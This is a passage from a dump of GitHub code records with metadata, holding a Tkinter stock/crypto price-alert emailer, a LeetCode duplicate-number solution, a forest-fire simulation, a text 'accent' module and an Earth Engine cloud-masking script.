"doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "enum.Enum", "line_number": 8, "usage_type": "name"}]}
+{"seq_id": "37344770348", "text": "import requests\nimport pprint\nimport csv\nimport smtplib\nimport os\nfrom datetime import datetime, timedelta\nfrom tkinter import *\nfrom twilio.rest import Client\nfrom requests.auth import HTTPBasicAuth\nfrom tkinter import messagebox\n\nMY_EMAIL = \"durubum@yahoo.com\"\nPASSWORD = os.getenv(\"PASSWORD\")\nVIRTUAL_TWILIO_NUMBER = \"\"\nVERIFIED_NUMBER = \"\"\nPASS = os.getenv(\"PASS\")\nBASIC = HTTPBasicAuth('golddust588', PASS)\n\nSTOCK_ENDPOINT = \"https://www.alphavantage.co/query\"\nCOIN_ENDPOINT = \"https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest\"\nNEWS_ENDPOINT = \"https://newsapi.org/v2/everything\"\nSHEETY_ENDPOINT = os.getenv(\"SHEETY_ENDPOINT\")\n\nALPHA_VANTAGE_API = os.getenv(\"ALPHA_VANTAGE_API\")\nCOINMARKETCAP_API_KEY = os.getenv(\"COINMARKETCAP_API_KEY\")\nNEWS_API_KEY = os.getenv(\"NEWS_API_KEY\")\nTWILIO_SID = \"\"\nTWILIO_AUTH_TOKEN = \"\"\n\n# ---------------------------- STOCKS TO BE IN UI ------------------------------------------------------------------ #\n# From https://www.nasdaq.com/market-activity/stocks/screener downloaded csv of Mega ($200>B) market cap stock\n# information at February 2023.\n\nwith open(\"top_stocks.csv\") as file:\n data = csv.reader(file)\n stock_symbols = []\n for row in data:\n if row[0] != \"Symbol\":\n stock_symbols.append(row[0])\n # print(stock_symbols)\n\nwith open(\"top_stocks.csv\") as file:\n data = csv.reader(file)\n full_stock_names = []\n for row in data:\n if row[1] != \"Name\":\n full_stock_names.append(row[1])\n # print(full_stock_names)\n\n# ---------------------------- COINS TO BE IN UI ------------------------------------------------------------------- #\n\n# Get top crypto by market cap information\nparameters = {\n \"start\": \"1\",\n \"limit\": \"15\",\n \"convert\": \"USD\",\n}\nheaders = {\n 'Accepts': 'application/json',\n 'X-CMC_PRO_API_KEY': COINMARKETCAP_API_KEY,\n}\n\nresponse = requests.get(url=COIN_ENDPOINT, params=parameters, headers=headers)\nresponse.raise_for_status()\n\ncoin_data = response.json()\n# pprint.pprint(coin_data)\n\n# Received coin_data is not sorted by the name of the Coin, but by the current market cap, so I decided to\n# make it myself.\n\n# This filters top 15 coin names from www.Coinbase.com based on Market Cap.\ncoin_symbols = []\nfor n in range(15):\n coin_symbols.append(coin_data[\"data\"][n][\"name\"])\n\n# ---------------------------- UI SETUP -------------------------------------------------------------------------- #\n\nwindow = Tk()\nwindow.title(\"Stock-Coin market news alert app\")\nwindow.config(padx=10, pady=10)\n\ncanvas = Canvas(width=600, height=304, highlightthickness=0)\nlock_img = PhotoImage(file=\"logo.png\")\ncanvas.create_image(300, 152, image=lock_img)\nfirst_text = canvas.create_text(400, 20, text=\"1. Choose a stock or a crypto you are interested in\",\n fill=\"green\", font=(\"Arial\", 11))\nsecond_text = canvas.create_text(400, 60, text=\"2. Select the percentage of daily price\\n change to be alerted\",\n fill=\"green\", font=(\"Arial\", 11))\nthird_text = canvas.create_text(150, 260, text=\"3. Enter your email to subscribe!\",\n fill=\"green\", font=(\"Arial\", 11))\ncanvas.grid(column=0, row=0, columnspan=3)\n\n# Labels:\n\nstock_label = Label(text=\"Choose a stock:\")\nstock_label.grid(column=0, row=1)\n\ncrypto_label = Label(text=\"Choose a crypto:\")\ncrypto_label.grid(column=0, row=2)\n\npercentage_label = Label(text=\"What percentage of price jump/drop you are interested in?:\")\npercentage_label.grid(column=0, row=3)\n\nemail_label = Label(text=\"Your email:\")\nemail_label.grid(column=0, row=4)\n\nsubscribe_label = Label(text=\"You can subscribe to one stock/crypto\\n price volatility alert at a time\",\n font=(\"Arial\", 10, \"bold\"))\nsubscribe_label.grid(column=0, row=5)\n\n\n# Spinbox\n\ndef spinbox_used():\n # gets the current value in spinbox.\n return spinbox.get()\n\n\nspinbox = Spinbox(from_=0, to=15, width=7, command=spinbox_used)\nspinbox.grid(column=1, row=3)\n\n# Entries:\n\nemail_entry = Entry(width=42)\nemail_entry.grid(column=1, row=4, columnspan=2)\n\n\ndef get_email():\n return email_entry.get()\n\n\n# Listbox with a scrollbar\n\nselected_stock = None # global variable\nselected_crypto = None # global variable\n\n\ndef on_stock_listbox_click(event):\n # Gets current selection from stock listbox\n global selected_stock\n global selected_crypto\n selected_stock = event.widget.get(event.widget.curselection())\n selected_crypto = None\n print(f\"Selected item: {selected_stock}\")\n\n\nstock_scrollbar = Scrollbar()\nstock_listbox = Listbox(height=6, yscrollcommand=stock_scrollbar.set)\nstock_listbox.grid(column=1, row=1)\nfor item in stock_symbols:\n stock_listbox.insert(stock_symbols.index(item), item)\nstock_listbox.selection_clear(0, END)\nstock_listbox.bind(\"<>\", on_stock_listbox_click)\nstock_scrollbar.config(command=stock_listbox.yview)\nstock_scrollbar.grid(column=2, row=1)\n\n\ndef on_crypto_listbox_click(event):\n # Gets current selection from crypto listbox\n global selected_crypto\n global selected_stock\n selected_crypto = event.widget.get(event.widget.curselection())\n selected_stock = None\n print(f\"Selected item: {selected_crypto}\")\n\n\ncrypto_scrollbar = Scrollbar()\ncrypto_listbox = Listbox(height=6, yscrollcommand=crypto_scrollbar.set)\ncrypto_listbox.grid(column=1, row=2)\nfor item in coin_symbols:\n crypto_listbox.insert(coin_symbols.index(item), item)\ncrypto_listbox.selection_clear(0, END)\ncrypto_listbox.bind(\"<>\", on_crypto_listbox_click)\ncrypto_scrollbar.config(command=crypto_listbox.yview)\ncrypto_scrollbar.grid(column=2, row=2)\n\n\n# ---------------------------- SHEETY DATABASE UPLOAD SUBSCRIPTIONS FROM UI ----------------------------------------- #\n\ndef subscribe():\n global BASIC\n if len(get_email()) == 0:\n messagebox.showinfo(title=\"Error\", message=\"Please enter your email.\")\n elif float(spinbox_used()) == 0.00:\n messagebox.showinfo(title=\"Error\", message=\"Please choose price volatility you want to follow.\")\n elif float(spinbox_used()) < 0:\n messagebox.showinfo(title=\"Error\", message=\"Can not be negative volatility.\")\n elif selected_stock is None and selected_crypto is None:\n messagebox.showinfo(title=\"Error\", message=\"Please choose one stock or crypto currency to follow.\")\n elif selected_crypto is None:\n is_ok_stock = messagebox.askokcancel(title=\"Subscription\", message=f\"These are the details entered: \\nChosen\"\n f\" stock: {selected_stock}\\n\"\n f\"Volatility to be alerted: {spinbox_used()}\\n\"\n f\"Your email: {get_email()}\\n\"\n f\"Pres OK to subscribe!\")\n\n if is_ok_stock:\n sheety_post_body = {\n \"lapas1\": {\n \"stocks\": selected_stock,\n \"cryptocurrencies\": selected_crypto,\n \"volatility\": spinbox_used(),\n \"email\": get_email()\n }\n }\n requests.post(SHEETY_ENDPOINT, json=sheety_post_body, auth=BASIC)\n else:\n is_ok_crypto = messagebox.askokcancel(title=\"Subscription\", message=f\"These are the details entered: \\nChosen\"\n f\" crypto currency: {selected_crypto}\\n\"\n f\"Volatility to be alerted: {spinbox_used()}\\n\"\n f\"Your email: {get_email()}\\n\"\n f\"Pres OK to subscribe!\")\n\n if is_ok_crypto:\n sheety_post_body = {\n \"lapas1\": {\n \"stocks\": selected_stock,\n \"cryptocurrencies\": selected_crypto,\n \"volatility\": spinbox_used(),\n \"email\": get_email()\n }\n }\n requests.post(SHEETY_ENDPOINT, json=sheety_post_body, auth=BASIC)\n\n\n# Buttons:\n\nsubscribe_button = Button(text=\"Subscribe to get latest news!\", width=36, activebackground=\"green\", command=subscribe)\nsubscribe_button.grid(column=1, row=5, columnspan=2)\n\nwindow.mainloop()\n\n\n# ---------------------------- TAKING DATA FROM SHEETY DATABASE TO SEND NEWS----------------------------------------- #\n\n\ndef send_news(coin_symbols, coin_data, stock_symbols, full_stock_names):\n global SHEETY_ENDPOINT\n global BASIC\n global ALPHA_VANTAGE_API\n global NEWS_API_KEY\n global MY_EMAIL\n global PASSWORD\n global VIRTUAL_TWILIO_NUMBER\n global VERIFIED_NUMBER\n\n response = requests.get(SHEETY_ENDPOINT, auth=BASIC)\n sheety_data = response.json()\n pprint.pprint(sheety_data)\n\n for subscription in sheety_data[\"lapas1\"]:\n volatility = subscription[\"volatility\"]\n email = subscription[\"email\"]\n\n # ---------------------------- STOCK SECTION ------------------------------------------------------------ #\n if subscription[\"cryptocurrencies\"] == \"\":\n subscribed_stock = subscription[\"stocks\"]\n\n # Get yesterday's closing stock price. API offers only hourly (not daily) time series for free,\n # so I use that.\n parameters = {\n \"function\": \"TIME_SERIES_INTRADAY\",\n \"symbol\": subscribed_stock,\n \"interval\": \"60min\",\n \"outputsize\": \"compact\",\n \"apikey\": ALPHA_VANTAGE_API,\n }\n\n response = requests.get(url=\"https://www.alphavantage.co/query\", params=parameters)\n response.raise_for_status()\n\n stock_data = response.json()\n # pprint.pprint(stock_data)\n\n # Because Stock Exchange probably is not at the same time zone as customer's, a bug in code forms.\n # The code does not perform if customer's time is already past midnight, but Stock Exchange is still in\n # yesterday's time zone.\n # Also, need to keep in mind that prises are based on US exchange market witch closes on friday 20:00 pm and\n # opens on monday morning.\n\n yesterday_date = (datetime.now() - timedelta(1)).strftime('%Y-%m-%d')\n\n last_open_market_date = stock_data[\"Meta Data\"][\"3. Last Refreshed\"][:10]\n last_market_date_object = datetime.strptime(last_open_market_date, '%Y-%m-%d')\n day_before_last_market_date = (last_market_date_object - timedelta(1)).strftime('%Y-%m-%d')\n two_days_before_last_market_day = (last_market_date_object - timedelta(2)).strftime('%Y-%m-%d')\n try:\n yesterday_closing_price = stock_data[\"Time Series (60min)\"][f\"{last_open_market_date} 20:00:00\"][\n \"4. close\"]\n day_before_closing_price = stock_data[\"Time Series (60min)\"][f\"{day_before_last_market_date} \"\n f\"20:00:00\"][\"4. close\"]\n difference = abs(float(yesterday_closing_price) - float(day_before_closing_price))\n stock_percentage_diff = round(difference * 100 / float(day_before_closing_price), 3)\n\n # print(difference)\n print(stock_percentage_diff)\n\n except KeyError:\n yesterday_closing_price = stock_data[\"Time Series (60min)\"][f\"{day_before_last_market_date} 20:00:00\"][\n \"4. close\"]\n day_before_closing_price = stock_data[\"Time Series (60min)\"][f\"{two_days_before_last_market_day}\"\n f\" 20:00:00\"][\"4. close\"]\n difference = abs(float(yesterday_closing_price) - float(day_before_closing_price))\n stock_percentage_diff = round(difference * 100 / float(day_before_closing_price), 3)\n # print(difference)\n print(stock_percentage_diff)\n\n if stock_percentage_diff > float(volatility):\n\n # ---------------------------- NEWS ARTICLES API SETUP + SEND EMAIL OR SMS -------------------------- #\n\n # Filtering company name of the stock symbol. From full stock name we need only first two words:\n i = stock_symbols.index(subscribed_stock)\n selected_stock_full_name = full_stock_names[i]\n first_two_words = \" \".join(selected_stock_full_name.split()[:2])\n\n # Getting recent news\n\n parameters = {\n \"q\": first_two_words,\n \"from\": yesterday_date,\n \"sortBy\": \"populiarity\",\n \"apikey\": NEWS_API_KEY,\n \"language\": 'en'\n }\n\n response = requests.get(url=\"https://newsapi.org/v2/everything\", params=parameters)\n response.raise_for_status()\n\n news_data = response.json()\n three_articles = news_data[\"articles\"][0:3]\n\n first_title = (three_articles[0][\"title\"]).replace('’', \"'\").replace(\"—\", \"-\").replace(\"…\", \"...\")\\\n .replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n first_description = (three_articles[0][\"description\"]).replace('’', \"'\").replace(\"—\", \"-\")\\\n .replace(\"…\", \"...\").replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n first_url = (three_articles[0][\"url\"])\n second_title = (three_articles[1][\"title\"]).replace('’', \"'\").replace(\"—\", \"-\").replace(\"…\", \"...\")\\\n .replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n second_description = (three_articles[1][\"description\"]).replace('’', \"'\").replace(\"—\", \"-\")\\\n .replace(\"…\", \"...\").replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n second_url = (three_articles[1][\"url\"])\n\n # News subject attribute:\n\n def stock_up_down():\n if float(yesterday_closing_price) > float(day_before_closing_price):\n return \"Up\"\n else:\n return \"Down\"\n\n stock_subject = f\"{subscribed_stock} is {stock_up_down()} by {stock_percentage_diff}%\"\n stock_subject.replace('’', \"'\")\n\n # Sending two most popular news stories of the day associated with particular stock/crypto\n\n email_text = f\"On the last stock market closure {stock_subject}, comparing from the day before.\\n\" \\\n f\"Here are some news on {subscribed_stock}:\\n\" \\\n f\"Headline: {first_title}\\n\" \\\n f\"Brief: {first_description}\\n\" \\\n f\"Read more: {first_url}\\n\" \\\n f\"Second Headline: {second_title}\\n\" \\\n f\"Second Brief: {second_description}\\n\" \\\n f\"Read more: {second_url}\\n\"\n\n # Setting up email sending\n\n with smtplib.SMTP(\"smtp.mail.yahoo.com\", port=587) as connection:\n connection.starttls()\n connection.login(user=MY_EMAIL, password=PASSWORD)\n connection.sendmail(\n from_addr=MY_EMAIL,\n to_addrs=email,\n msg=f\"Subject:{stock_subject}\\n\\n{email_text}\"\n )\n\n # This function instead of email, sends SMS, which I prefer and use. For the sake of simplicity,\n # in the UI there is only email option.\n\n # client = Client(TWILIO_SID, TWILIO_AUTH_TOKEN)\n # message = client.messages.create(\n # body=f\"{subscribed_stock}: {stock_up_down}{stock_percentage_diff}%\\n\"\n # f\"Headline: {first_title}\\n\"\n # f\"Brief: {first_description}\",\n # from_=VIRTUAL_TWILIO_NUMBER,\n # to=VERIFIED_NUMBER\n # )\n # print(message.sid)\n\n # ---------------------------- COIN PRICE VOLATILITY ---------------------------------------- #\n else:\n subscribed_crypto = subscription[\"cryptocurrencies\"]\n i = coin_symbols.index(subscribed_crypto)\n coin_percentage_diff = coin_data[\"data\"][i][\"quote\"][\"USD\"][\"percent_change_24h\"]\n print(coin_percentage_diff)\n\n if abs(float(coin_percentage_diff)) > float(volatility):\n yesterday_date = (datetime.now() - timedelta(1)).strftime('%Y-%m-%d')\n\n # Getting recent news if needed\n\n parameters = {\n \"q\": subscribed_crypto,\n \"from\": yesterday_date,\n \"sortBy\": \"populiarity\",\n \"apikey\": NEWS_API_KEY,\n \"language\": 'en'\n }\n\n response = requests.get(url=\"https://newsapi.org/v2/everything\", params=parameters)\n response.raise_for_status()\n\n news_data = response.json()\n three_articles = news_data[\"articles\"][0:3]\n\n first_title = (three_articles[0][\"title\"]).replace('’', \"'\").replace(\"—\", \"-\").replace(\"…\", \"...\")\\\n .replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n first_description = (three_articles[0][\"description\"]).replace('’', \"'\").replace(\"—\", \"-\")\\\n .replace(\"…\", \"...\").replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n first_url = (three_articles[0][\"url\"])\n second_title = (three_articles[1][\"title\"]).replace('’', \"'\").replace(\"—\", \"-\").replace(\"…\", \"...\")\\\n .replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n second_description = (three_articles[1][\"description\"]).replace('’', \"'\").replace(\"—\", \"-\")\\\n .replace(\"…\", \"...\").replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n second_url = (three_articles[1][\"url\"])\n\n # News subject attribute:\n\n def coin_up_down():\n if float(coin_percentage_diff) > 0:\n return \"Up\"\n else:\n return \"Down\"\n\n coin_subject = f\"{subscribed_crypto} is {coin_up_down()} by {coin_percentage_diff}%\"\n coin_subject.replace('’', \"'\")\n\n email_text = f\"In the last 24h {coin_subject}.\\n\" \\\n f\"Here are some news on {subscribed_crypto}:\\n\" \\\n f\"Headline: {first_title}\\n\" \\\n f\"Brief: {first_description}\\n\" \\\n f\"Read more: {first_url}\\n\" \\\n f\"Second Headline: {second_title}\\n\" \\\n f\"Second Brief: {second_description}\\n\" \\\n f\"Read more: {second_url}\\n\"\n\n # Setting up email sending\n\n with smtplib.SMTP(\"smtp.mail.yahoo.com\", port=587) as connection:\n connection.starttls()\n connection.login(user=MY_EMAIL, password=PASSWORD)\n connection.sendmail(\n from_addr=MY_EMAIL,\n to_addrs=email,\n msg=f\"Subject:{coin_subject}\\n\\n{email_text}\"\n )\n\n # This function instead of email, sends SMS, which I prefer and use. For the sake of simplicity,\n # in the UI there is only email option.\n\n # client = Client(TWILIO_SID, TWILIO_AUTH_TOKEN)\n # message = client.messages.create(\n # body=f\"{subscribed_crypto}: {coin_up_down}{coin_percentage_diff}%\\n\"\n # f\"Headline: {first_title}\\n\"\n # f\"Brief: {first_description}\",\n # from_=VIRTUAL_TWILIO_NUMBER,\n # to=VERIFIED_NUMBER\n # )\n # print(message.sid)\n\n\nsend_news(coin_symbols=coin_symbols, coin_data=coin_data, stock_symbols=stock_symbols,\n full_stock_names=full_stock_names)\n", "repo_name": "golddust588/Stock-Crypto-price-change-tracking", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 20625, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 17, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 22, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 24, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 25, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 26, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 35, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 43, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 63, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 184, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 184, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 186, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 186, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 188, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 188, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 190, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 190, "usage_type": "name"}, {"api_name": "tkinter.messagebox.askokcancel", "line_number": 192, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 192, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 207, "usage_type": "call"}, {"api_name": "tkinter.messagebox.askokcancel", "line_number": 209, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 209, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 224, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 248, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 250, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 270, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 282, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 282, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 282, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 285, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 285, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 286, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 287, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 328, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 369, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 399, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 399, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 399, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 411, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 450, "usage_type": "call"}]}
+{"seq_id": "17718532948", "text": "# coding:utf-8\n\nfrom typing import List\n\n\nclass Solution:\n \"\"\"\n problem 287\n https://leetcode-cn.com/problems/find-the-duplicate-number/\n\n 给定一个包含 n + 1 个整数的数组 nums,其数字都在 1 到 n 之间(包括 1 和 n),可知至少存在一个重复的整数。\n 假设只有一个重复的整数,找出这个重复的数。\n\n 示例 1:\n 输入: [1,3,4,2,2]\n 输出: 2\n\n 示例 2:\n 输入: [3,1,3,4,2]\n 输出: 3\n\n 说明:\n 不能更改原数组(假设数组是只读的)。\n 只能使用额外的 O(1) 的空间。\n 时间复杂度小于 O(n^2) 。\n 数组中只有一个重复的数字,但它可能不止重复出现一次。\n \"\"\"\n\n def findDuplicate(self, nums: List[int]) -> int:\n size = len(nums)\n left, right = 1, size - 1\n\n while left < right:\n mid = (left + right) >> 1\n cnt = 0\n for num in nums:\n if num <= mid:\n cnt += 1\n\n # 根据抽屉原理,小于等于 4 的数的个数如果严格大于 4 个,\n # 此时重复元素一定出现在 [1, 4] 区间里\n if cnt > mid:\n # 重复的元素一定出现在 [left, mid] 区间里\n right = mid\n else:\n # if 分析正确了以后,else 搜索的区间就是 if 的反面\n # [mid + 1, right]\n left = mid + 1\n return left\n\n def _tortoise_and_rabbit_cyclic_detection_(self, nums: List[int]) -> int:\n \"\"\"\n 不要求掌握,大概了解就行\n 弗洛伊德的乌龟和兔子(循环检测,鸽舍原理,抽屉原理)\n https://leetcode-cn.com/problems/find-the-duplicate-number/solution/xun-zhao-zhong-fu-shu-by-leetcode/\n \"\"\"\n # Find the intersection point of the two runners.\n tortoise = nums[0]\n hare = nums[0]\n while True:\n tortoise = nums[tortoise]\n hare = nums[nums[hare]]\n if tortoise == hare:\n break\n\n # Find the \"entrance\" to the cycle.\n ptr1 = nums[0]\n ptr2 = tortoise\n while ptr1 != ptr2:\n ptr1 = nums[ptr1]\n ptr2 = nums[ptr2]\n\n return ptr1\n\n\nif __name__ == '__main__':\n nums = [3, 1, 3, 4, 2]\n res = Solution().findDuplicate(nums)\n print(res)\n", "repo_name": "weiguozhao/LeetCodes", "sub_path": "src/_python/hot100/287_FindtheDuplicateNumber.py", "file_name": "287_FindtheDuplicateNumber.py", "file_ext": "py", "file_size_in_byte": 2399, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "typing.List", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 51, "usage_type": "name"}]}
+{"seq_id": "11577779608", "text": "import numpy as np\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\nimport sys\r\n\r\n\r\nargs = sys.argv\r\nn_args = len(args)\r\nforest_shape = (int(args[1]),int(args[1])) if n_args>1 else (200,200) \r\nforest_density = float(args[2]) if n_args>1 else 0.7\r\np_fire = float(args[3]) if n_args>1 else 0.1\r\np_extinguish = float(args[4]) if n_args>1 else 0.08\r\n\r\ndef make_forest(shape, density):\r\n forest = np.zeros(shape)\r\n for i in range(len(forest)):\r\n for j in range(len(forest[i])):\r\n r = np.random.rand()\r\n if r < density:\r\n forest[i][j] = 1 #plant tree\r\n return forest\r\n\r\nforest = make_forest(forest_shape, forest_density)\r\nburning_trees = []\r\n\r\ndef get_first_tree():\r\n i = np.random.randint(forest.shape[0])\r\n j = np.random.randint(forest.shape[1])\r\n\r\n if forest[i][j] == 1:\r\n return (i,j)\r\n else:\r\n return get_first_tree()\r\n\r\n\r\nfirst_tree = get_first_tree()\r\nforest[first_tree[0]][first_tree[1]] = 2\r\nburning_trees.append(first_tree)\r\n\r\n\r\ndef step():\r\n burning_aux=[]\r\n\r\n for tree in burning_trees:\r\n adjecent_trees = get_adjecent_trees(tree)\r\n for adj_tree in adjecent_trees:\r\n r = np.random.rand()\r\n if r Generator[str, None, None]:\n yield from random.choices(CURSED_ES, k=count)\n\n\ndef next_cursed_e(ctx: ReplacementContext) -> str:\n if ctx.state is None:\n # this is a little hack for knowing the amount of e's we will need ahead of time.\n # this number will usually be greater than the actual amount of e's used because\n # not all letters are replaced, but the advantage is using random.choices only\n # once\n ctx.state = cursed_e_generator(len(ctx.source))\n\n return next(ctx.state)\n\n\ndef e(m: Match) -> str:\n if m.severity < 5:\n return \"e\" if m.original.islower() else \"E\"\n\n elif m.severity < 10:\n return \"E\"\n\n return next_cursed_e(m.context)\n\n\nclass E(Accent):\n \"\"\"Eeeeee eeeeeeeeeee eee eeee.\"\"\"\n\n PATTERNS = {\n r\"[a-z]\": e,\n }\n", "repo_name": "Fogapod/pink-accents", "sub_path": "examples/e.py", "file_name": "e.py", "file_ext": "py", "file_size_in_byte": 1117, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "random.choices", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.Generator", "line_number": 13, "usage_type": "name"}, {"api_name": "pink_accents.ReplacementContext", "line_number": 17, "usage_type": "name"}, {"api_name": "pink_accents.Match", "line_number": 28, "usage_type": "name"}, {"api_name": "pink_accents.Accent", "line_number": 38, "usage_type": "name"}]}
+{"seq_id": "5129863055", "text": "#################################\n# Modules #\n#################################\n\nimport ee\nfrom datetime import datetime\nfrom IPython.display import Image, display,HTML\nfrom ee_ipl_uv import multitemporal_cloud_masking\nfrom ee_ipl_uv import download\nimport os\nimport requests\n\nee.Initialize()\n\n\n\n#################################\n# DATA #\n#################################\n\n# Image & dataset name \nimage_index = \"LC08_204020_20180704\" # Image to remove clouds\ndataset_index = 'LANDSAT/LC08/C01/T1_TOA' # Dataset containing picture\n\n# Import Image from Google Earth Data\nimage_predict_clouds = ee.Image(dataset_index + '/' + image_index) \n\n# Area analyzed\nregion_of_interest = ee.Geometry.Polygon(\n [[[-2.775208282272615,57.01860739003285],\n [-2.453858184616365,57.01860739003285],\n [-2.453858184616365,57.18122162676308],\n [-2.775208282272615,57.18122162676308]]])\n\n# Date of image analyzed\ndatetime_image = datetime.utcfromtimestamp(image_predict_clouds.get(\"system:time_start\") \\\n .getInfo()/1000) \\\n .strftime(\"%Y-%m-%d %H:%M:%S\")\n\n#################################\n# Visualization Image #\n#################################\nimageRGB = image_predict_clouds.visualize(max=.3,bands=[\"B4\",\"B3\",\"B2\"])\nimage_file_original = download.MaybeDownloadThumb(imageRGB.clip(region_of_interest),params={\"dimensions\": \"400x400\"})\n\ndef viz_cloudscore_mask(cloudscoremask):\n cloudscoremask_vis = cloudscoremask.updateMask(cloudscoremask)\n cloudscoremask_vis = cloudscoremask_vis.visualize(max=1,min=0,palette=['1f77b4', 'ff7f0e'])\n mosaic = ee.ImageCollection([imageRGB, cloudscoremask_vis]).mosaic()\n return download.MaybeDownloadThumb(mosaic.clip(region_of_interest),params={\"dimensions\": \"400x400\"})\n\n\n#################################\n# Méthod persistence #\n#################################\ncloud_score_persistence, pred_persistence = multitemporal_cloud_masking.CloudClusterScore(image_predict_clouds,\n region_of_interest,\n method_pred=\"persistence\")\npersistence_pred_file = download.MaybeDownloadThumb(pred_persistence.clip(region_of_interest),\n params={\"dimensions\": \"400x400\",\n \"bands\":\"B4_forecast,B3_forecast,B2_forecast\",\n \"max\":.3})\n", "repo_name": "alexandreb09/Sentinel-Cloud-Masking", "sub_path": "Build_model/Methods_cloud_masking/NoteBooks/Landsat8_Extraction_nuage.py", "file_name": "Landsat8_Extraction_nuage.py", "file_ext": "py", "file_size_in_byte": 2719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "ee.Initialize", "line_number": 13, "usage_type": "call"}, {"api_name": "ee.Image", "line_number": 26, "usage_type": "call"}, {"api_name": "ee.Geometry.Polygon", "line_number": 29, "usage_type": "call"}, {"api_name": "ee.Geometry", "line_number": 29, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "name"}, {"api_name": "ee_ipl_uv.download.MaybeDownloadThumb", "line_number": 44, "usage_type": "call"}, {"api_name": "ee_ipl_uv.download", "line_number": 44, "usage_type": "name"}, {"api_name": "ee.ImageCollection", "line_number": 49, "usage_type": "call"}, {"api_name": "ee_ipl_uv.download.MaybeDownloadThumb", "line_number": 50, "usage_type": "call"}, {"api_name": "ee_ipl_uv.download", "line_number": 50, "usage_type": "name"}, {"api_name": "ee_ipl_uv.multitemporal_cloud_masking.CloudClusterScore", "line_number": 56, "usage_type": "call"}, {"api_name": "ee_ipl_uv.multitemporal_cloud_masking", "line_number": 56, "usage_type": "name"}, {"api_name": "ee_ipl_uv.download.MaybeDownloadThumb", "line_number": 59, "usage_type": "call"}, {"api_name": "ee_ipl_uv.download", "line_number": 59, "usage_type": "name"}]}
